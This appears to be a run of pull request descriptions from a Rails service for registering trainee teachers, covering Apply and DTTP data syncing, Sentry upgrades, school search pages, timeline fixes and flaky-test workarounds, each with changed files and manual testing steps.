config/sidekiq_cron_schedule.yml
db/migrate/20210317131340_create_apply_applications.rb
db/migrate/20210317155738_create_apply_application_sync_requests.rb
db/schema.rb
spec/factories/apply_application_sync_requests.rb
spec/factories/apply_applications.rb
spec/jobs/apply_api/import_applications_job_spec.rb
spec/models/apply_application_spec.rb
spec/models/provider_spec.rb
spec/services/apply_api/import_application_spec.rb
spec/services/apply_api/retrieve_applications_spec.rb
spec/support/api_stubs/apply_api.rb

https://trello.com/c/xXqfjTsB/1241-l-retrieve-applications-from-apply
- This is a new job scheduled to run at 1am daily.
- It only runs if the `import_applications_from_apply` feature flag is turned on.
- If checks when the last successful sync with Apply happened, calls the `RetrieveApplications` to collect those applications, and iterates over them calling `ImportApplication` to create them.
- This service takes a timestamp `accepted_since`, makes a request to retrieve all applications from Apply.
- It filters the returned json to include only those applications that have been accepted since the timestamp it was provided. It returns all applications if no timestamp is provided.
- It also logs the request (successful or not) by creating a `ApplyApplicationSyncRequest`.
- This service …

[1241] Import applications from Apply

---

Gemfile
Gemfile.lock

[Ticket Link](https://trello.com/c/55JD7wHf/1448-actiondispatchhttpmimenegotiationinvalidtype)
`ActionDispatch::Http::MimeNegotiation::InvalidType` is ignored by `sentry-rails` by [default](https://github.com/getsentry/sentry-ruby/blob/ac722f0527360f05cfb83286a158addf162c3dea/sentry-rails/lib/sentry/rails/configuration.rb#L34).
This upgrade will help reduce noise caused by this exception.
Replace `sentry-raven` gem with `sentry-rails` and `sentry-sidekiq`
1. Running `curl -I -H "Content-Type:INVALID MIME TYPE" <register-app-url>` returns `HTTP/1.1 406 Not Acceptable`, and captures an exception in sentry.
2. With this change the exception is triggered nonetheless, but sentry doesn't bother to deal with it.

[1448] Replace sentry-raven with sentry-rails and sentry-sidekiq

---

app/controllers/trainees/qts_recommendations_controller.rb
app/controllers/trn_submissions_controller.rb
app/jobs/retrieve_qts_job.rb
app/jobs/retrieve_trn_job.rb
config/settings.yml
spec/config/settings_spec.rb
spec/controllers/trainees/qts_recommendations_controller_spec.rb
spec/controllers/trn_submissions_controller_spec.rb
spec/jobs/retrieve_qts_job_spec.rb
spec/jobs/retrieve_trn_job_spec.rb

We poll DTTP for TRN and QTS status. The interval we are polling is a bit too long and has left users waiting in register for information that has been available to them in DTTP for quite a while.
Update settings to poll for TRN and QTS hourly rather than six hourly.
Continue to poll for four days rather than two as there can be delays
and weekends.

[1414] Poll DTTP once per hour

---

app/jobs/dttp/sync_users_job.rb
app/lib/dttp/parsers/contact.rb
app/models/dttp/user.rb
app/services/dttp/retrieve_users.rb
config/sidekiq_cron_schedule.yml
db/migrate/20210408150651_create_dttp_users.rb
db/schema.rb
spec/factories/dttp/users.rb
spec/jobs/sync_users_job_spec.rb
spec/lib/dttp/parsers/contact_spec.rb
spec/models/dttp/user_spec.rb
spec/services/dttp/retrieve_users_spec.rb
spec/support/api_stubs/dttp/contact.rb

- In prep for [this](https://trello.com/c/OLvM8OAI/1416-l-provider-lookup) ticket, we are saving all Dttp users locally in register so we can reference to them when necessary and without making requests to Dttp. 
- To do this, we are importing (then syncing) all dttp users who are portal_users and saving them locally through a job which runs nightly 
- A `Dttp::SyncUsersJob` scheduled nightly which in turn runs `Dttp::RetrieveUsers`, retrieving all users who are portal users.
- With each of these users, we run  `Dttp::ImportUser` which calls `find_or_initialize_by` using the dttp_id of the user. If the user exists, we update all the user attributes and sync the user with Dttp, or if they don't, we create a new dttp_user
- A new model called `Dttp::User` which saves the imported user. 
- …

[1439] Sync user list from DTTP

---

app/views/sign_in/index.html.erb
config/initializers/date_formats.rb

Since we changed from GMT to BST the times on the timelines are incorrect. This PR changes the timeline times to match the local time zone.
- https://rtt-review-pr-765.herokuapp.com/
- Visit a trainee in a non draft state. E.g `Pending TRN`  
- Make a change, for example add a degree
- Go to the timeline and check that the time the change was made matches the current time

[1437] Change timeline times to match local time zone

---

app/components/paginated_filter/view.html.erb
spec/features/trainees/filtering_trainees_spec.rb
spec/support/page_objects/trainees/index.rb

- [This trello ticket](https://trello.com/c/vClmil5T/1408-s-only-show-sort-options-if-there-are-results-to-sort)
- The sort links to sort by name or date updated were shown even if there were no results to sort
- Only display the sort by links if there are sortable results
- Start your rails server, navigate to `https://localhost.com` and login using persona or DSI
- Use the search feature, but ensure that no trainees are returned. You may need to delete some in order to achieve this. 
- The sort by links will not be shown when there are no trainees returned in the filter.

[1408] Sort links displayed only if matches are returned

---

app/components/trainees/confirmation/degrees/view.rb
app/forms/degree_form.rb
app/lib/dttp/params/degree_qualification.rb
app/models/degree.rb
app/views/trainees/degrees/_non_uk_degree_form.html.erb
config/initializers/enic_non_uk.rb
config/locales/pages/data_requirements/en.yml
db/migrate/20210414150758_change_non_uk_degree_non_naric_to_non_enic.rb
db/schema.rb
spec/factories/degrees.rb
spec/lib/dttp/params/degree_qualification_spec.rb
spec/support/page_objects/trainees/new_degree_details.rb

https://trello.com/c/Y68eiyWD/1404-s-rename-naric-to-enic
- Renames all instances of `NARIC` to `ENIC`.
- Includes a migration to change all trainee degrees that have 'non_naric' recorded as their `non_uk_degree` to `non_enic`
- Check that saving non-enic degrees still works ok and the content is consistent.

[1404] Rename NARIC to ENIC

---

app/controllers/trainees/diversity/disability_disclosures_controller.rb
app/forms/diversities/disability_disclosure_form.rb
app/models/trainee.rb
spec/features/trainees/diversities/edit_disability_disclosure_spec.rb

- [This trello ticket](https://trello.com/c/CrSrVFaO/1431-changing-disability-states-doesnt-get-rid-of-previous-disability)
- Added a new method in trainees that clears their disabilities, called `clear_disabilities` 
- This method is called on the `trainee` inside the `DisabilityDisclosuresController` if the trainees disability_disclosure is set to either `disability_not_provided` or `no_disability`. 
- Fire up your `rails server`
- View a draft trainee you have previously made
- Click on Diversity Information
- Click on the `Change` link next to Disabilities
- Ensure you have selected `Yes, they shared that they're disabled`
- Select some disabilities and press continue
- Repeat the process by changing it again, but this time select `They shared that they're not disabled`
- The …

[1431] [Bug] Fixing persisting disabilities when disability state changed

---

app/components/status_card/style.scss
app/components/status_card/view.html.erb

The status cards were flagged as part of the accessibility review. DAC pointed out "that some users with colour deficiencies or low vision, may not realise that these elements are clickable."
- Additional markup required for the proposed `text-decoration` added
- `text-decoration` style added plus a few extra CSS rules on the new element in anticipation of an upcoming refactor of the status cards.
- Removal of an unwanted `letter-spacing` rule 
View the home page and compare to the live service. You should see an underlined status name and a small reduction in letter spacing within each status card.

1463 non text colour contrast fix

---

app/helpers/application_helper.rb
app/lib/training_route_manager.rb
app/views/trainees/training_routes/_form_fields.html.erb
config/settings.yml
config/settings/development.yml
config/settings/qa.yml
config/settings/review.yml
spec/features/trainees/creating_a_new_trainee_spec.rb
spec/features/trainees/edit_trainee_training_route_spec.rb
spec/lib/training_route_manager_spec.rb
spec/support/features.rb
spec/views/trainees/review_draft/show.html.erb_spec.rb
spec/views/trainees/show.html.erb_spec.rb

Requires a small change to the test setup. This will now raise an error
when attempting to set a nested feature that hasn’t been defined.
https://trello.com/c/IWaiPEmK/1430-s-nest-route-features
- Nests routes feature flags like this:
```
routes:
provider_led_postgrad: false
early_years_undergrad: false
```
And changes all places they are references in the codebase to reflect this.
- Updates the test helper to allow the setting and restoring of nested features.

[1430] Nest routes features

---

app/controllers/system_admin/dttp_providers_controller.rb
app/models/dttp/provider.rb
app/models/provider.rb
app/views/system_admin/dttp_providers/index.html.erb
config/routes.rb
db/migrate/20210419084629_change_dttp_providers_dttp_id_to_uuid.rb
db/schema.rb
spec/features/dttp_providers/list_providers_spec.rb
spec/models/dttp/provider_spec.rb

On the list of provider results from the DTTP lookup add an 'Create' button that creates a provider record for the selected provider.
- Change `Dttp::Provider#dttp_id` column to be a uuid instead of string.
- Add a relationship between `Dttp::Provider` and `Provider` based on `dttp_id` to easily check against existing records
- Add a create button that imports the `Dttp::Provider` record over to the `Provider` list.
Navigate to `system-admin/dttp_providers`, and from the list, choose a provider to import and click the "Create" button against that record.
On successful creation, the user is redirected to the providers page.

[1417] Add create action from Dttp::Provider to Provider

---

app/components/trainees/confirmation/degrees/view.rb
app/controllers/trainees/degrees/confirm_details_controller.rb
app/views/sign_in/index.html.erb
app/views/trainees/personal_details/show.html.erb
config/locales/en.yml
config/routes.rb
spec/components/trainees/confirmation/degrees/view_spec.rb
spec/features/trainees/degrees/delete_degree_spec.rb
spec/support/page_objects/trainees/degrees_confirm.rb
spec/views/trainees/personal_details/show.html.erb_spec.rb

https://trello.com/c/izwer1EG/1403-show-banner-when-last-degree-deleted
* Creates new degrees confirm details controller which decides whether to render confirmation component or incomplete section component depending whether the trainee has a degree. 
* Add a degree text to button no longer exists, as now dealt with by incomplete section component
* Edit feature test to test that incomplete component renders in user journey
* Add view spec for personal details show page 
Delete a trainee's degree so that component renders like below

[1403] Show banner when last degree deleted

---

app/components/tab_navigation/style.scss
app/components/user_card/style.scss
app/components/user_card/view.html.erb
app/components/user_card/view.rb
app/controllers/system_admin/imports/users_controller.rb
app/views/system_admin/dttp_providers/index.html.erb
app/views/system_admin/providers/show.html.erb
config/routes.rb
db/schema.rb
spec/features/users/viewing_users_spec.rb
spec/support/page_objects/providers/show.rb

Dependent on this PR: https://github.com/DFE-Digital/register-trainee-teachers/pull/759
- Show a button in the list of unregistered users which will allow them to be registered to the provider
- You can follow the steps from this PR https://github.com/DFE-Digital/register-trainee-teachers/pull/751 to get a local list of DTTP Users or you can create a couple manually in the console. You just need to set the `provider_dttp_user_id` on the `dttp_user` record to match the provider you want to test registering with
- Once above is done the dttp user should show on the provider's show page with a button to register
- Click register and the dttp user should re-appear as a registered User

[1418] - Add user from DTTP

---

app/controllers/system_admin/validation_errors_controller.rb
app/policies/validation_error_policy.rb
app/views/system_admin/_menu.html.erb
app/views/system_admin/validation_errors/index.html.erb
config/locales/en.yml
config/routes.rb
spec/factories/validation_errors.rb
spec/features/validation_errors/list_validation_errors_spec.rb
spec/support/features/authentication_steps.rb
spec/support/features/page_helpers.rb
spec/support/page_objects/validation_errors/index.rb

https://trello.com/c/wwobcHLC/1550-m-validation-errors-page-in-support-console
* new page in system admin section showing validation errors, similar to apply
* login as admin and visit '/system-admin/validation_errors'
* If you don't see errors, try to add a new trainee and submit a form without any values to show error.

[1550] validation errors page added to system admin

---

app/helpers/application_helper.rb
app/models/course.rb
app/models/trainee.rb
app/views/trainees/training_routes/_form_fields.html.erb
config/initializers/training_routes.rb
config/locales/en.yml
config/settings.yml
spec/factories/courses.rb
spec/factories/trainees.rb
spec/features/trainees/creating_a_new_trainee_spec.rb
spec/features/trainees/edit_confirm_publish_course_spec.rb
spec/features/trainees/edit_publish_course_details_spec.rb
spec/models/course_spec.rb
spec/support/page_objects/trainees/new.rb

Training routes
All of the following is toggable 
Early years (assessment only)
Early years (graduate entry)
Early years (graduate employment based)
Early years (undergrad)
School direct (salaried)
School direct (tuition fee)
Go to https://rtt-review-pr-782.herokuapp.com/trainees/new currently set to true for everything, 
There is a number of concept in play.
`TRAINING_ROUTE_ENUMS` and `TRAINING_ROUTES`
- The full list
`TRAINING_ROUTES_FOR_TRAINEE` 
- only applicable for trainee
`TRAINING_ROUTES_FOR_COURSE` 
- only applicable for course, fixed as it was making not constrained enough https://github.com/DFE-Digital/register-trainee-teachers/blob/724cd9cce80a7fca584269e41e0a9709f7845498/app/services/teacher_training_api/import_course.rb#L71-L81
`TRAINING_ROUTE_FEATURE_FLAGS` 
- toggle items …

1556 add basic new route info

---

app/components/trainees/record_details/view.rb
app/helpers/trainee_helper.rb
app/views/trainees/show.html.erb
spec/components/trainees/record_details/view_preview.rb
spec/components/trainees/record_details/view_spec.rb
spec/factories/trainees.rb
spec/features/trainees/recording_training_outcome_spec.rb
spec/features/trainees/viewing_the_timeline_spec.rb
spec/views/trainees/show.html.erb_spec.rb

- https://trello.com/c/qRN4iH4S/1549-m-created-submitted-updated-dates-and-their-timeline-equivalents-dont-match-up
Update the `RecordDetails::View` component such that the `last_updated_date` property returns the most recent event from the list of timeline events (as Ed desired) to `sync` what has happened in the timeline view with what is displayed to the user through this component.
This PR also fixes another bug (likely a remnant from early stages of the app) where the TRN submission date was just set to `Time.zone.yesterday` to render the actual submission date. This broke a few tests since this date is required by the component. If you're viewing this component via the trainee record page, the trainee should have a trn submission date so have updated some of the trainee traits to …

[1549] Fix timeline bug for record details component

---

.github/workflows/build.yml
app/components/form_components/autocomplete/script.js
app/components/form_components/autocomplete/view.rb
app/controllers/trainees/degrees_controller.rb
app/controllers/trainees/personal_details_controller.rb
app/forms/course_details_form.rb
app/forms/degree_form.rb
app/forms/degrees_form.rb
app/forms/personal_details_form.rb
app/validators/autocomplete_validator.rb
app/views/trainees/course_details/edit.html.erb
app/views/trainees/degrees/_non_uk_degree_form.html.erb
app/views/trainees/degrees/_uk_degree_form.html.erb
app/views/trainees/personal_details/_nationality_select_field.html.erb
config/locales/en.yml
db/schema.rb
spec/components/form_components/autocomplete/view_preview.rb
spec/components/form_components/autocomplete/view_spec.rb
spec/features/trainees/degrees/adding_degree_spec.rb
spec/features/trainees/edit_course_details_spec.rb
spec/features/trainees/edit_personal_details_spec.rb
spec/rails_helper.rb
spec/support/capybara.rb
spec/support/page_objects/trainees/course_details.rb
spec/support/page_objects/trainees/new_degree_details.rb
spec/support/page_objects/trainees/personal_details.rb
spec/validators/autocomplete_validator_spec.rb

Ticket: https://trello.com/c/dEEa06yg/1243-m-improve-handling-of-freetext-responses-to-autocompletes-that-require-a-fixed-answer
Adds a validation to all autocompletes (excluding country) so that the
User will get a specific message if they type something into the field
but fail to select a value.
This works by submitting a text and select input for the autocomplete
field and comparing the two in a form object validation.
To test this, it was easiest to do a feature test because there are 
parts in the views, controller and form objects that need to all slot
together to ensure the validation is correctly shown to the user. This
required setting up chrome web driver on CI, and enabling js for these
tests using `js: true`
The country autocomplete was left out because it uses an external js …

[1243] Improve handling of freetext responses to autocomplete fields

---

Gemfile
Gemfile.lock
config/initializers/sentry.rb

Sentry is not capturing exceptions since the upgrade from raven to sentry https://github.com/DFE-Digital/register-trainee-teachers/pull/748
Add `sentry-ruby` gem.
Add initializer with minimal config (including commit hash mapping)

[1602] sentry is not receiving exceptions

---

app/controllers/trainees/lead_schools_controller.rb
app/forms/trainee_lead_school_form.rb
app/helpers/school_helper.rb
app/policies/trainee_policy.rb
app/services/form_store.rb
app/services/school_search.rb
app/views/trainees/lead_schools/index.html.erb
config/locales/en.yml
config/routes.rb
config/settings/test.yml
spec/factories/schools.rb
spec/features/trainees/non_js_lead_school_search_spec.rb
spec/forms/trainee_lead_school_form_spec.rb
spec/support/features/page_helpers.rb
spec/support/page_objects/trainees/lead_schools_search_page.rb

https://trello.com/c/wDKw1P00/1560-m-no-js-lead-schools-results-page
- New `Trainees::LeadSchoolsController` to drive the search/results page
- `TraineeLeadSchoolForm` to validate and save/stash school selection
Run the following code to seed the schools table:
```ruby
FactoryBot.find_definitions rescue nil
FactoryBot.create_list(:school, 20, lead_school: true)
```
Add the rollowing settings to your `development.local.yml`:
```yaml
features:
routes:
school_direct_salaried: true
```
- Create a new “School direct (salaried)” trainee
- Visit `/trainee/<trainee_id>/lead-schools`
- Click "Continue" without choosing a school - it should display a validation error
- Select a school and click "Continue" - it will …

[1560] Non-JS lead schools results page

---

app/forms/trainee_form.rb
app/views/trainees/review_draft/show.html.erb
config/settings.yml
config/settings/development.yml
spec/forms/trainee_form_spec.rb

https://trello.com/c/yi8K7QwO/1575-allow-validation-tracking-to-be-turned-off-locally
* New setting added `Settings.track_validation_errors`
* Default is `true`
* Set `Settings.track_validation_errors` true/false
* Add new trainee, go to one of the forms and save without entering data
* Check `/system-admin/validation_errors`

[1575] Allow validation tracking to be turned off locally

---

app/controllers/trainees/degrees/confirm_details_controller.rb
spec/features/trainees/degrees/editing_degree_spec.rb
spec/support/page_objects/trainees/degrees_confirm.rb

https://trello.com/c/pUgEHOAS/1615-bug-updating-degree-from-a-non-draft-trainee
- Replace `DegreeForm` with `DegreesForm` in `Trainees::Degrees::ConfirmDetailsController`
- Add spec to ensure the code is covered for updating degrees for non-draft trainees which uses the `FormStore`
- Visit `/trainees`
- Filter by "Pending TRN" and choose a trainee
- Under the personal details tab, edit a degree, make change and update
- It should now work as expected

[1615] Bug fix - updating non-draft trainee degrees broken

---

app/controllers/trainees/employing_schools_controller.rb
app/forms/employing_school_form.rb
app/forms/lead_school_form.rb
app/lib/training_route_manager.rb
app/models/trainee.rb
app/policies/trainee_policy.rb
app/services/form_store.rb
app/views/trainees/employing_schools/index.html.erb
app/views/trainees/lead_schools/_no_results.html.erb
app/views/trainees/review_draft/show.html.erb
config/locales/en.yml
config/routes.rb
config/settings/development.yml
db/migrate/20210426162034_add_employing_school_to_trainee.rb
db/schema.rb
spec/features/trainees/non_js_employing_school_search_spec.rb
spec/forms/employing_school_form_spec.rb
spec/forms/lead_school_form_spec.rb
spec/lib/training_route_manager_spec.rb
spec/support/features/page_helpers.rb
spec/support/page_objects/trainees/employing_schools_search.rb
spec/support/page_objects/trainees/lead_schools_search.rb

https://trello.com/c/uRMbZcBM/1565-no-js-employing-schools-results-page
Similar to this PR for lead schools: https://github.com/DFE-Digital/register-trainee-teachers/pull/794
This PR:
- Adds `employing_school_id` onto trainees and creates the association
- Creates `Trainees::EmployingSchoolsController` to drive the search/results page for employing schools
- Creates `TraineeEmployingSchoolForm` to validate and save/stash school selection
As per John's PR:
Run the following code to seed the schools table:
```ruby
FactoryBot.find_definitions rescue nil
FactoryBot.create_list(:school, 20)
```
Add the following settings to your `development.local.yml`:
```yaml
features:
routes:
school_direct_salaried: true
```
- …

[1565] No JS employing schools search results page

---

app/services/dttp/retrieve_providers.rb
spec/services/dttp/retrieve_providers_spec.rb

We were retrieving inactive providers and they were often listed instead of their active counterparts where a provider has been recreated in DTTP. This seems to have happened a lot when names have been changed from <provider> (EBITT) to <provider>.
We'll need to clear the providers table and repopulate but I'll do that manually when deployed.
This may still not be the totally correct list of providers but it will be less broken than it currently is. I'm checking with the operations team and will update in another PR when I get some feedback.
Retrieve only providers that are active from DTTP.
Check the DTTP providers list in the support bit. There are lots of (EBITT)-ses in the provider names. They have all been deactivated in DTTP.
Delete them all from your local DB and repopulate the …

[1614] Active providers only

---

app/components/trainees/confirmation/withdrawal_details/view.html.erb
app/components/trainees/confirmation/withdrawal_details/view.rb
app/forms/withdrawal_form.rb
app/views/trainees/withdrawals/show.html.erb
config/locales/en.yml
spec/components/trainees/confirmation/withdrawal_details/view_spec.rb
spec/features/trainees/withdraw_trainee_spec.rb
spec/forms/withdrawal_form_spec.rb
spec/support/page_objects/sections/deferral_notice.rb
spec/support/page_objects/trainees/withdrawal.rb

- https://trello.com/c/5UK9osuw/1577-s-dev-use-deferral-date-as-withdrawal-date-where-a-deferred-trainee-is-withdrawing
- Use the deferral date as the withdrawal date when withdrawing a trainee that's been deferred.
- Load a deferred trainee and withdraw them
- Assert the date is set to the deferral date

[1577] Use deferral date for withdraw date if deferred

---

app/controllers/trainees/lead_schools_controller.rb
app/forms/lead_school_form.rb
app/forms/trainee_form.rb
app/views/trainees/lead_schools/_no_results.html.erb
app/views/trainees/lead_schools/_results.html.erb
app/views/trainees/lead_schools/index.html.erb
config/locales/en.yml
config/settings/review.yml
lib/tasks/example_data.rake
spec/features/trainees/non_js_lead_school_search_spec.rb
spec/support/page_objects/trainees/lead_schools_search.rb

https://trello.com/c/YjiZoLhp/1563-m-search-again-lead-schools-results
- Split `app/views/trainees/lead_schools/index.html.erb` into partials: `results` and `no_results`
- Add search again field to `no_results` partial
- Update `LeadSchoolsController` to handle search again operations via `PUT` request
- Add validation to search fields (probably the most complex part)
- Update rake task `example_data:generate` to generation fake schools 
Run the following code to seed the schools table and enable the feature:
```ruby
FactoryBot.find_definitions rescue nil
FactoryBot.create_list(:school, 20, lead_school: true)
```
Add the rollowing settings to your `development.local.yml`:
```yaml
features:
routes: …
```

[1563] Search again (lead schools results)

---

app/lib/dttp/code_sets/institution_types.rb
app/services/dttp/retrieve_providers.rb
spec/services/dttp/retrieve_providers_spec.rb

DTTP
SCITTS (institution type) and  Status Reason (accounts/organisation)
Added scitts code set to be used for query for provider as well.
`statuscode` is an extension of `statecode` either of which can be configured as part of CRM offerings.
But generally `statecode` is the actual `Status` and can only fall in to `Active` or `Inactive`.
And `statuscode` is the underlying `Status Reason` of which it can `Closed` is 1 of 10 options for `Status` with `Active`

[1625] Fixed scitts gone a missed as well as status reasoning

---

app/jobs/retrieve_award_job.rb
app/jobs/retrieve_trn_job.rb
app/lib/notify_on_timeout.rb
spec/jobs/retrieve_award_job_spec.rb
spec/jobs/retrieve_trn_job_spec.rb

https://trello.com/c/cetXU8sR/1548-alert-if-retrievetrn-qts-jobs-time-out
Jobs were timing out silently
* Adds module with `send_message_to_slack` method that uses `SlackNotifierService`. The method is then used in both jobs, module is included. When polling takes longer than 4 days, the job ceases to continue polling and instead uses that method to send a failure message to #twd_publish_register_tech channel. 
* Adds extra method stub and assertions for job specs
Create new trainee in console and set required values. Set `trainee.submitted_for_trn_at` and/or `trainee.recommended_for_award_at` to 4 or more days ago, save trainee. Then run job(s)

[1548] Alert if retrieve trn or qts/award jobs time out

---

app/components/trainees/school_details/view.html.erb
app/components/trainees/school_details/view.rb
app/views/trainees/show.html.erb
config/locales/en.yml
spec/components/trainees/school_details/view_preview.rb
spec/components/trainees/school_details/view_spec.rb
spec/factories/schools.rb
spec/factories/trainees.rb
spec/features/trainees/edit_trainee_record_spec.rb
spec/support/page_objects/sections/summaries/school_detail.rb
spec/support/page_objects/trainees/record.rb

- https://trello.com/c/thldQc4L/1620-add-schools-section-to-trainee-show-page-ie-non-draft
- Builds the schools component to be used in the record page and `/check-details`
- Needs a bit of manual prep to set up the trainee as the school work is still in flux. But you'll need to attach a school record as the `lead_school` or `employing_school` on a trainee and head to their record page to see it.

[1619] Add schools component and render it in the record page

---

config/locales/en.yml

`Choose a school` didn't work as for no-js you're not choosing, you're searching. By reframing as what you need to enter, we avoid this issue.

Update school picker error messages

---

app/models/school.rb
db/migrate/20210426105838_add_searchable_to_schools.rb
db/schema.rb
spec/models/school_spec.rb

https://trello.com/c/eDPvoBTN/1630-improve-schools-search-performance 
Following on from spike: https://github.com/DFE-Digital/register-trainee-teachers/pull/807
This column stores a tsvector that we can index for using in searches,
giving a big performance boost.
We need to update this tsvector column any time the school changes so
that the search index can be kept up to date. This must be done in an
active record callback (alternatively using a database trigger would
require using some raw sql in a migration that couldn’t be represented
in schema.rb, and we don’t want to use an sql formatted schema).
Also add an index on the close_date as we can search for only open 
schools, this also speeds up the search query.
If you want to observe the performance difference yourself. Install the …

[1630] Add searchable column to schools

---

app/components/form_components/schools_autocomplete/script.js
app/controllers/api/schools_controller.rb
app/controllers/trainees/employing_schools_controller.rb
app/controllers/trainees/lead_schools_controller.rb
app/models/trainee.rb
app/views/trainees/employing_schools/edit.html.erb
config/locales/en.yml
config/routes.rb
config/settings/development.yml
config/settings/review.yml
config/settings/test.yml
spec/factories/trainees.rb
spec/features/trainees/employing_school_search_spec.rb
spec/features/trainees/lead_school_search_spec.rb
spec/features/trainees/non_js_employing_school_search_spec.rb
spec/features/trainees/non_js_lead_school_search_spec.rb
spec/support/features/page_helpers.rb
spec/support/page_objects/trainees/edit_employing_school.rb

https://trello.com/c/Fzlrmd01/1559-m-employing-school-form-page
This is based off this PR: https://github.com/DFE-Digital/register-trainee-teachers/pull/800
- Created a new edit page for trainee employing schools, with the JS autocomplete containing both lead and non-lead 
schools
- Is the JS is disabled, then a separate input submits a query to the no-js employing school form page
- Populate your database with some lead schools, like so:
- `FactoryBot.create_list(:school, 10)`
- Navigate to a draft trainee
- Navigate to `trainees/:slug/employing-schools/edit`
- Search for one of the schools you created, select and continue
- Return to the form, search again, but don't select anything from the dropdown.
- Check that you're redirected to the no-JS version of the employing school page with …

[1559] Employing school form page

---

app/services/trainees/create_timeline_events.rb
spec/factories/trainees.rb
spec/services/trainees/create_timeline_events_spec.rb

https://trello.com/c/3H42RsxZ/1642-fix-qts-timeline-translation
The translations for the timeline were originally mapped from the state name (originally `recommended_for_qts`).
The state is now `recommended_for_award`, but we had two separate translation keys `recommended_for_qts` and `recommended_for_eyts`. Neither of these are states, and the actual state `recommended_for_award` had no translation.
To fix, I've added logic to the `CreateTimelineEvent` that chooses the correct translation based on the trainees `award_type`.
- Choose a non-draft trainee on an EYTS route who has been recommended for EYTS
- Check the timeline has the correct translation 'Recommended for EYTS'
- Choose a non-draft trainee on an EYTS route who has received EYTS
- Check the timeline has the correct translation …

[1642] Ensure timeline shows correct translations for QTS/EYTS

---

app/models/trainee.rb
db/migrate/20210505144011_add_apply_applications_to_trainees.rb
db/schema.rb
spec/factories/trainees.rb
spec/models/trainee_spec.rb

https://trello.com/c/U8UCQsW9/1649-s-add-applyapplicationid
- Migration to add apply_application association to trainees
- Helper method to flag if a trainee has an apply application or not

[1649] Add apply_application to trainees

---

app/components/trainees/sections/view.rb
app/forms/trn_submission_form.rb
app/views/trainees/check_details/show.html.erb
config/locales/en.yml
spec/components/pages/trainees/check_details/view_preview.rb
spec/components/trainees/sections/view_preview.rb
spec/components/trainees/sections/view_spec.rb
spec/factories/trainees.rb
spec/forms/trn_submission_form_spec.rb

- https://trello.com/c/sCThNDo3/1619-add-schools-section-to-check-details-page
- Render the lead school component in the /check-details
- Refactor the `TrnSubmissionForm` so it's a bit more flexible for which route sections its validating

1619] Add lead schools component to check-details

---

spec/features/trainees/lead_school_search_spec.rb
spec/support/features.rb
spec/support/features/js_helpers.rb

Capybara sometimes has a problem triggering click events:
https://medium.com/@yuliaoletskaya/capybara-inconsistent-click-behavior-and-flickering-tests-f50b5fae8ab2
> The reason behind that is the fact that web driver’s click() method is asynchronous and sometimes Capybara starts the code execution before JS finishes initializing its listeners
Manually triggering a click event on the objects we are trying to click
Is a known workaround

Attempt to fix lead schools flakeys

---

app/controllers/api/schools_controller.rb

https://trello.com/c/Okt410cM/1668-truncate-schools-results-in-autocomplete
Our school autocomplete does not pass a `limit` parameter to the API. The absence of this parameter should mean that the default is applied (i.e. 15 as per the `SchoolSearch` service).
This PR ensures the API only passes a limit to the search service if one is explicitly set as a param.
- Search for a school using the autocomplete
- Check that a maximum of 15 results are returned in the results drop down.

[1668] Fix no truncation on autocomplete schools

---

app/forms/validate_publish_course_form.rb
app/views/trainees/review_draft/show.html.erb
config/locales/en.yml
spec/features/trainees/edit_publish_course_details_spec.rb
spec/support/page_objects/trainees/confirm_publish_course.rb

The confirm course button now marks the progress as complete when a provider has related courses. 
- Add `validate_publish_course_form` - to allow for progress check
- Remove redundant test
- Fix translation on page title
- Add courses to a specific persona E.G `FactoryBot.create_list :course, 50, provider_id: 125`
- Add a trainee doing `Provider-led (postgrad)` training
- Navigate to `trainees/{trainee-id}/publish-course-details/edit`  - Check that the page title has been fixed here too. 
- Select a course, click `Continue`, then `Confirm course`
- Check the progress next to course details has changed to `COMPLETED`

1646 confirm course marks the section complete

---

spec/forms/diversities/ethnic_background_form_spec.rb

- [This trello ticket](https://trello.com/c/EAfyKH8S/1669-fix-flakey-diversities-test)
- There was a flakey diversities test, which sometimes tried to change the diversity of a trainee but with the diversity they were already registered on
- Removed the trainees diversity from the list of diversities to ensure uniqueness
- Run the spec as many times as you like

[1669] Fix flakey diversities test

---

app/components/trainees/sections/view.rb
app/forms/trn_submission_form.rb
app/views/trainees/check_details/show.html.erb
spec/forms/trn_submission_form_spec.rb

- [This trello ticket](https://trello.com/c/j56ZaOYb/1661-add-employing-school-logic-to-check-details-page)
- Added `Schools::FormValidator` in the trainee section view, for the check-details page
Create a trainee and fill out all fields. Then navigate to `https://localhost:5000/trainees/#{trainee.slug}/check-details` to see the school section populated

[1661] Add employing school logic to check details page

---

app/lib/dttp/code_sets/nationalities.rb

Tristanian was mapped to 'British'. It should be the same as St Helenian.
Update the mapping.
Check that the UUID matches St Helenian. 
In the 'Nations' section of DTTP you can also check the ID of that St Helena, Ascension and Tristan da Cunha

[1673] Fix Tristanian DTTP mapping

---

spec/features/trainees/employing_school_search_spec.rb

This fix has already been applied to the lead school search spec.
https://github.com/DFE-Digital/register-trainee-teachers/pull/851
The click method switches between using `.click` and `.trigger(:click)`
depending on if the test is using js or not. `.trigger(:click)` needs
to be used when we are using js as capybara can start running before
the web driver has initialised its event hooks (eg. Triggering the click
event handlers when something is clicked), so we need to trigger it 
manually.

Fix flakey employing school search spec

---

app/views/trainees/check_details/show.html.erb

The school section is only visible on the check-details page when the
route requires it.
This section was being shown and consequently required for all routes.
The view with the issue doesn't currently have a view spec and the extra functionality added here isn't in a component although the page has a component preview. I've not added a spec for this as it will delay fixing a production issue that is affecting users but I've carded up a review of this with a view to:
* making this view into a component and adding a spec for this UI
* reviewing/adding an end to end add trainee journey feature spec as this issue didn't cause a feature spec to fail which it should have done
Conditionally show the section using the `RouteManager#requires_schools?` predicate.
* Run the app
* Add an AO trainee …

[1684] Conditionally hide schools section

---

app/lib/dttp/params/placement_assignment.rb
spec/lib/dttp/params/placement_assignment_spec.rb

https://trello.com/c/kaIFSi7t/1677-s-early-years-undergrad-needs-to-set-dfecourselevel-to-ug
* `PlacementAssignment` updated, courselevel is set to UG when route is early years undergrad.

[1677] Set courselvel to UG if early years undergrad

---

.github/workflows/build.yml
docker-compose.yml

Dependatbot PR checks are failing because secrets are inaccessible for dependabot PRs. 
Use `docker/` actions
Don't access GitHub secrets when building `dependabot` PRs

Don't access secrets for dependabot PR builds

---

app/components/trainees/route_indicator/view.html.erb
app/components/trainees/route_indicator/view.rb
app/services/trainees/create_from_apply.rb
config/locales/en.yml
db/migrate/20210512153010_add_course_code_to_trainees.rb
db/schema.rb
spec/components/trainees/route_indicator/view_preview.rb
spec/components/trainees/route_indicator/view_spec.rb
spec/factories/trainees.rb
